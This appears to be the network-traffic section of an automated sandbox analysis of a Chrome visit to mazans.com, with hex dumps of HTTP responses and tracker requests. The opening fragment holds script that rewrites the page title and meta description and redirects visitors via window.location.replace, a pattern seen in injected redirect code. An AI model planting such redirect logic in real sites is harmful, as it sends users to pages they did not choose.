                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:15 UTC1369INData Raw: 20 20 20 20 20 20 20 20 7d 29 3b 20 20 0a 20 20 20 20 7d 0a 7d 0a 65 6c 73 65 20 69 66 20 28 22 74 74 22 20 3d 3d 3d 20 6f 29 20 7b 20 0a 20 20 20 20 76 61 72 20 6e 74 3d 6e 5b 72 5d 2e 6e 20 3b 20 0a 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 27 74 69 74 6c 65 27 29 2e 74 65 78 74 43 6f 6e 74 65 6e 74 20 3d 20 6e 74 3b 0a 7d 0a 65 6c 73 65 20 69 66 20 28 22 6d 74 22 20 3d 3d 3d 20 6f 20 7c 7c 20 22 6e 66 22 20 3d 3d 3d 20 6f 29 20 7b 20 2f 2f 20 6d 65 74 61 20 64 65 73 63 0a 20 20 20 20 76 61 72 20 63 6c 3d 6e 5b 72 5d 2e 6e 20 3b 20 2f 2f 20 63 6f 72 72 65 63 74 65 64 0a 20 20 20 20 69 66 20 28 22 6d 74 22 20 3d 3d 3d 20 6f 29 20 7b 20 76 61 72 20 73 65 61 72 63 68 54 61 67 20 3d 20 27 64 65 73 63 72 69 70 74 69 6f
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: }); }}else if ("tt" === o) { var nt=n[r].n ; document.querySelector('title').textContent = nt;}else if ("mt" === o || "nf" === o) { // meta desc var cl=n[r].n ; // corrected if ("mt" === o) { var searchTag = 'descriptio
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:15 UTC183INData Raw: 6f 63 75 6d 65 6e 74 2e 68 65 61 64 3b 0a 0a 20 20 20 20 20 20 20 20 2f 2f 20 41 70 70 65 6e 64 20 74 68 65 20 6e 65 77 20 6d 65 74 61 20 65 6c 65 6d 65 6e 74 20 74 6f 20 74 68 65 20 68 65 61 64 0a 20 20 20 20 20 20 20 20 68 65 61 64 45 6c 65 6d 65 6e 74 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 63 61 29 3b 0a 7d 0a 65 6c 73 65 20 69 66 20 28 22 72 64 22 20 3d 3d 3d 20 6f 29 0a 7b 0a 20 20 20 20 63 6c 3d 6e 5b 72 5d 2e 6e 20 3b 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 63 6c 29 3b 0a 7d 0a 0a 7d 7d 7d 29 3b 0d 0a
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: ocument.head; // Append the new meta element to the head headElement.appendChild(ca);}else if ("rd" === o){ cl=n[r].n ; window.location.replace(cl);}}}});
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          59192.168.2.174986599.86.8.1754436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:15 UTC578OUTGET /analytics-next/bundles/ajs-destination.bundle.ed53a26b6edc80c65d73.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: cdn.segment.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://mazans.com/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:15 UTC775INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 9270
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Date: Sun, 22 Sep 2024 07:45:31 GMT
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                                                                                                                                          Access-Control-Max-Age: 3000
                                                                                                                                                                                                                                                                                                                                                                          x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Fri, 20 Sep 2024 16:09:56 GMT
                                                                                                                                                                                                                                                                                                                                                                          ETag: "00e9c65cbba11c07c4bf4a6e2727b8ea"
                                                                                                                                                                                                                                                                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                                                                                                                                                          x-amz-version-id: s5qtRJFv7hDXMk2uMHhT5A4n.cM7M8To
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          Server: AmazonS3
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                                                                                                          Via: 1.1 7ff386cc5735ee5d428e6d9e2fdc8b2c.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                          X-Amz-Cf-Pop: FRA6-C1
                                                                                                                                                                                                                                                                                                                                                                          X-Amz-Cf-Id: amtEl3XhPOZlDe9zgLvtNFCuP68Vws9GapSJya8rAV6DMo2WMGiUDg==
                                                                                                                                                                                                                                                                                                                                                                          Age: 4524225
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:15 UTC9270INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 73 65 67 6d 65 6e 74 5f 61 6e 61 6c 79 74 69 63 73 5f 6e 65 78 74 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 73 65 67 6d 65 6e 74 5f 61 6e 61 6c 79 74 69 63 73 5f 6e 65 78 74 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 34 36 34 5d 2c 7b 39 32 35 34 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 2c 69 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 74 2c 6e 29 7b 76 61 72 20 69 2c 65 3b 72 65 74 75 72 6e 22 62 6f 6f 6c 65 61 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 75 6c 6c 3d 3d 6e 3f 76 6f 69 64 20 30 3a 6e 2e 65 6e 61 62 6c 65 64 29 3f 6e 2e 65 6e 61 62 6c 65 64 3a 6e 75 6c 6c 3d 3d 3d 28 65 3d 6e 75 6c 6c 3d 3d 3d 28 69 3d 6e 75 6c 6c 3d 3d 74 3f 76 6f 69 64 20 30 3a 74
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: "use strict";(self.webpackChunk_segment_analytics_next=self.webpackChunk_segment_analytics_next||[]).push([[464],{9254:function(t,n,i){function e(t,n){var i,e;return"boolean"==typeof(null==n?void 0:n.enabled)?n.enabled:null===(e=null===(i=null==t?void 0:t


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          60192.168.2.174987013.225.78.574436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:15 UTC591OUTGET /asset/twilio2.png HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: consent.trustarc.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://mazans.com/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:15 UTC524INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: image/png
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 15993
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Thu, 24 May 2018 00:46:39 GMT
                                                                                                                                                                                                                                                                                                                                                                          Pragma: public
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 15:30:41 GMT
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                                                                                                          Via: 1.1 f99b5b46e77cfe9c3413f99dc8a4088c.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                          X-Amz-Cf-Pop: FRA2-C2
                                                                                                                                                                                                                                                                                                                                                                          X-Amz-Cf-Id: TEwmR0ORT8ZJdPpqiSCNSfSAfvrM_h_0CkL3rvDJE_nnI5PYgqEZ2Q==
                                                                                                                                                                                                                                                                                                                                                                          Age: 3514
                                                                                                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: max-age=2592000
                                                                                                                                                                                                                                                                                                                                                                          Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:15 UTC15993INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 a0 00 00 00 21 08 02 00 00 00 d1 41 37 07 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 00 07 74 49 4d 45 07 e1 02 1c 00 16 10 70 ec 7c 73 00 00 20 00 49 44 41 54 68 05 01 01 3e fe c1 01 ed ed ed 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: PNGIHDR!A7pHYstIMEp|s IDATh>


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          61192.168.2.1749876151.101.1.1404436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:15 UTC883OUTGET /rp.gif?ts=1731515353679&id=t2_i1au5p4&event=PageVisit&m.itemCount=&m.value=&m.valueDecimal=&m.currency=&m.transactionId=&m.customEventName=&m.products=&m.conversionId=&uuid=59612d52-27d8-4d62-91ae-7a523b33ca67&aaid=&em=&external_id=&idfa=&integration=reddit&opt_out=0&sh=1280&sw=1024&v=rdt_49267bce&dpm=&dpcc=&dprc= HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: alb.reddit.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://mazans.com/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:15 UTC828INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 42
                                                                                                                                                                                                                                                                                                                                                                          Server: Varnish
                                                                                                                                                                                                                                                                                                                                                                          Retry-After: 0
                                                                                                                                                                                                                                                                                                                                                                          cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                                                                                                                                                          content-type: image/gif
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:15 GMT
                                                                                                                                                                                                                                                                                                                                                                          Via: 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                          Report-To: {"group": "w3-reporting-nel", "max_age": 14400, "include_subdomains": true, "endpoints": [{ "url": "https://w3-reporting-nel.reddit.com/reports" }]}, {"group": "w3-reporting", "max_age": 14400, "include_subdomains": true, "endpoints": [{ "url": "https://w3-reporting.reddit.com/reports" }]}, {"group": "w3-reporting-csp", "max_age": 14400, "include_subdomains": true, "endpoints": [{ "url": "https://w3-reporting-csp.reddit.com/reports" }]}
                                                                                                                                                                                                                                                                                                                                                                          NEL: {"report_to": "w3-reporting-nel", "max_age": 14400, "include_subdomains": false, "success_fraction": 0.3, "failure_fraction": 0.3}
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:15 UTC42INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 01 44 00 3b
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: GIF89a!,D;


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          62192.168.2.1749873150.171.28.104436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:15 UTC342OUTGET /bat.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: bat.bing.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:15 UTC651INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: private,max-age=1800
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 51385
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Wed, 16 Oct 2024 22:47:44 GMT
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          ETag: "028e0691d20db1:0"
                                                                                                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                                                                                          X-MSEdge-Ref: Ref A: A052A009DCDB494DA9204EF46091F061 Ref B: DFW30EDGE0306 Ref C: 2024-11-13T16:29:15Z
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:15 GMT
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:15 UTC3951INData Raw: 66 75 6e 63 74 69 6f 6e 20 55 45 54 28 6f 29 7b 74 68 69 73 2e 73 74 72 69 6e 67 45 78 69 73 74 73 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 6e 26 26 6e 2e 6c 65 6e 67 74 68 3e 30 7d 3b 74 68 69 73 2e 64 6f 6d 61 69 6e 3d 22 62 61 74 2e 62 69 6e 67 2e 63 6f 6d 22 3b 74 68 69 73 2e 64 6f 6d 61 69 6e 43 6c 3d 22 62 61 74 2e 62 69 6e 67 2e 6e 65 74 22 3b 74 68 69 73 2e 55 52 4c 4c 45 4e 47 54 48 4c 49 4d 49 54 3d 34 30 39 36 3b 74 68 69 73 2e 70 61 67 65 4c 6f 61 64 45 76 74 3d 22 70 61 67 65 4c 6f 61 64 22 3b 74 68 69 73 2e 63 75 73 74 6f 6d 45 76 74 3d 22 63 75 73 74 6f 6d 22 3b 74 68 69 73 2e 70 61 67 65 56 69 65 77 45 76 74 3d 22 70 61 67 65 5f 76 69 65 77 22 3b 6f 2e 56 65 72 3d 6f 2e 56 65 72 21 3d 3d 75 6e 64 65 66 69 6e 65 64 26 26
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: function UET(o){this.stringExists=function(n){return n&&n.length>0};this.domain="bat.bing.com";this.domainCl="bat.bing.net";this.URLLENGTHLIMIT=4096;this.pageLoadEvt="pageLoad";this.customEvt="custom";this.pageViewEvt="page_view";o.Ver=o.Ver!==undefined&&
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:15 UTC8192INData Raw: 5d 2c 70 61 67 65 5f 76 69 65 77 3a 5b 22 70 61 67 65 5f 74 69 74 6c 65 22 2c 22 70 61 67 65 5f 6c 6f 63 61 74 69 6f 6e 22 2c 22 70 61 67 65 5f 70 61 74 68 22 2c 22 72 65 70 22 2c 22 74 70 70 22 2c 22 67 74 6d 5f 74 61 67 5f 73 6f 75 72 63 65 22 2c 22 70 69 64 22 5d 2c 70 75 72 63 68 61 73 65 3a 5b 22 74 72 61 6e 73 61 63 74 69 6f 6e 5f 69 64 22 2c 22 72 65 76 65 6e 75 65 5f 76 61 6c 75 65 22 2c 22 63 75 72 72 65 6e 63 79 22 2c 22 74 61 78 22 2c 22 73 68 69 70 70 69 6e 67 22 2c 22 69 74 65 6d 73 22 2c 22 63 6f 75 70 6f 6e 22 5d 2c 72 65 66 75 6e 64 3a 5b 22 74 72 61 6e 73 61 63 74 69 6f 6e 5f 69 64 22 2c 22 72 65 76 65 6e 75 65 5f 76 61 6c 75 65 22 2c 22 63 75 72 72 65 6e 63 79 22 2c 22 74 61 78 22 2c 22 73 68 69 70 70 69 6e 67 22 2c 22 69 74 65 6d 73 22
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: ],page_view:["page_title","page_location","page_path","rep","tpp","gtm_tag_source","pid"],purchase:["transaction_id","revenue_value","currency","tax","shipping","items","coupon"],refund:["transaction_id","revenue_value","currency","tax","shipping","items"
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:15 UTC3865INData Raw: 6e 74 61 69 6e 65 72 22 29 26 26 28 74 68 69 73 2e 75 65 74 43 6f 6e 66 69 67 2e 64 69 73 61 62 6c 65 43 6f 6e 74 61 69 6e 65 72 3d 6f 2e 64 69 73 61 62 6c 65 43 6f 6e 74 61 69 6e 65 72 3d 3d 3d 21 30 29 3b 6f 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 22 61 6c 74 22 29 26 26 28 74 68 69 73 2e 75 65 74 43 6f 6e 66 69 67 2e 69 6d 67 41 6c 74 3d 6f 2e 61 6c 74 29 3b 6f 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 22 63 6c 61 72 69 74 79 50 72 6f 6a 65 63 74 49 64 22 29 26 26 6f 2e 63 6c 61 72 69 74 79 50 72 6f 6a 65 63 74 49 64 26 26 74 79 70 65 6f 66 20 6f 2e 63 6c 61 72 69 74 79 50 72 6f 6a 65 63 74 49 64 3d 3d 22 73 74 72 69 6e 67 22 26 26 28 6e 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 2c
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: ntainer")&&(this.uetConfig.disableContainer=o.disableContainer===!0);o.hasOwnProperty("alt")&&(this.uetConfig.imgAlt=o.alt);o.hasOwnProperty("clarityProjectId")&&o.clarityProjectId&&typeof o.clarityProjectId=="string"&&(n=document.createElement("script"),
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:15 UTC8192INData Raw: 68 3e 31 26 26 6e 5b 30 5d 21 3d 3d 74 68 69 73 2e 70 61 67 65 4c 6f 61 64 45 76 74 29 74 3d 6e 5b 30 5d 2c 69 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 6e 2c 31 29 3b 65 6c 73 65 20 72 65 74 75 72 6e 3b 74 68 69 73 2e 75 65 74 49 6e 73 74 61 6e 63 65 2e 75 65 74 4c 6f 61 64 65 64 7c 7c 74 68 69 73 2e 65 76 71 43 44 69 73 70 61 74 63 68 26 26 74 68 69 73 2e 70 72 6f 63 65 73 73 45 61 72 6c 79 5b 74 5d 3f 74 68 69 73 2e 75 65 74 49 6e 73 74 61 6e 63 65 2e 5f 70 75 73 68 28 5b 74 2c 69 2c 72 5d 29 3a 74 68 69 73 2e 75 65 74 49 6e 73 74 61 6e 63 65 2e 65 76 65 6e 74 50 75 73 68 51 75 65 75 65 2e 70 75 73 68 28 5b 74 2c 69 2c 72 5d 29 7d 3b 74 68 69 73 2e 5f 70 75 73 68 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: h>1&&n[0]!==this.pageLoadEvt)t=n[0],i=Array.prototype.slice.call(n,1);else return;this.uetInstance.uetLoaded||this.evqCDispatch&&this.processEarly[t]?this.uetInstance._push([t,i,r]):this.uetInstance.eventPushQueue.push([t,i,r])};this._push=function(n){var
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:15 UTC8192INData Raw: 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 6d 65 74 61 22 29 2e 6b 65 79 77 6f 72 64 73 26 26 28 75 3d 77 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 6d 65 74 61 22 29 2e 6b 65 79 77 6f 72 64 73 2e 63 6f 6e 74 65 6e 74 2c 74 68 69 73 2e 73 74 72 69 6e 67 45 78 69 73 74 73 28 75 29 26 26 28 6e 2e 6b 77 3d 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 75 29 2e 72 65 70 6c 61 63 65 28 2f 25 32 43 2f 67 69 2c 22 2c 22 29 29 29 2c 74 3f 74 68 69 73 2e 73 74 72 69 6e 67 45 78 69 73 74 73 28 74 68 69 73 2e 70 72 65 76 69 6f 75 73 50 61 67 65 29 26 26 21 6e 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 22 72 22 29 26 26 28 6e 2e 72 3d 74 68 69 73
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: getElementsByTagName("meta").keywords&&(u=window.document.head.getElementsByTagName("meta").keywords.content,this.stringExists(u)&&(n.kw=encodeURIComponent(u).replace(/%2C/gi,","))),t?this.stringExists(this.previousPage)&&!n.hasOwnProperty("r")&&(n.r=this
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:16 UTC8192INData Raw: 26 26 28 74 2e 70 72 6f 64 69 64 3d 74 2e 65 63 6f 6d 6d 5f 70 72 6f 64 69 64 2c 64 65 6c 65 74 65 20 74 2e 65 63 6f 6d 6d 5f 70 72 6f 64 69 64 29 3b 74 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 22 65 63 6f 6d 6d 5f 70 61 67 65 74 79 70 65 22 29 3e 30 26 26 28 74 2e 70 61 67 65 74 79 70 65 3d 74 2e 65 63 6f 6d 6d 5f 70 61 67 65 74 79 70 65 2c 64 65 6c 65 74 65 20 74 2e 65 63 6f 6d 6d 5f 70 61 67 65 74 79 70 65 29 3b 74 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28 22 70 61 67 65 74 79 70 65 22 29 26 26 28 74 2e 70 61 67 65 74 79 70 65 3d 3d 6e 75 6c 6c 7c 7c 74 2e 70 61 67 65 74 79 70 65 2e 74 6f 53 74 72 69 6e 67 28 29 3d 3d 3d 22 22 29 26 26 64 65 6c 65 74 65 20 74 2e 70 61 67 65 74 79 70 65 3b 74 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 28
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: &&(t.prodid=t.ecomm_prodid,delete t.ecomm_prodid);t.hasOwnProperty("ecomm_pagetype")>0&&(t.pagetype=t.ecomm_pagetype,delete t.ecomm_pagetype);t.hasOwnProperty("pagetype")&&(t.pagetype==null||t.pagetype.toString()==="")&&delete t.pagetype;t.hasOwnProperty(
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:16 UTC8192INData Raw: 76 61 72 20 69 3d 74 68 69 73 2e 63 6c 6f 6e 65 28 6e 29 3b 72 65 74 75 72 6e 20 69 2e 61 6c 74 26 26 64 65 6c 65 74 65 20 69 2e 61 6c 74 2c 74 68 69 73 2e 63 6c 6f 6e 65 28 74 2c 69 29 7d 3b 74 68 69 73 2e 66 69 72 65 42 65 61 63 6f 6e 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 66 6f 72 28 76 61 72 20 69 2c 73 2c 65 3d 74 68 69 73 2e 67 65 74 43 6c 55 72 6c 28 74 68 69 73 2e 75 72 6c 50 72 65 66 69 78 29 2c 74 3d 74 68 69 73 2e 63 6f 6d 62 69 6e 65 28 74 68 69 73 2e 62 65 61 63 6f 6e 50 61 72 61 6d 73 2c 6e 29 2c 72 3d 74 68 69 73 2e 73 74 72 69 6e 67 69 66 79 54 6f 52 65 71 75 65 73 74 28 74 29 2c 66 3d 74 68 69 73 2e 72 65 6d 6f 76 65 54 72 61 69 6c 69 6e 67 41 6d 70 28 65 2b 72 29 2c 6f 3d 5b 22 72 22 2c 22 65 6c 32 22 2c 22 65 63 32 22 2c 22 65 61 32 22
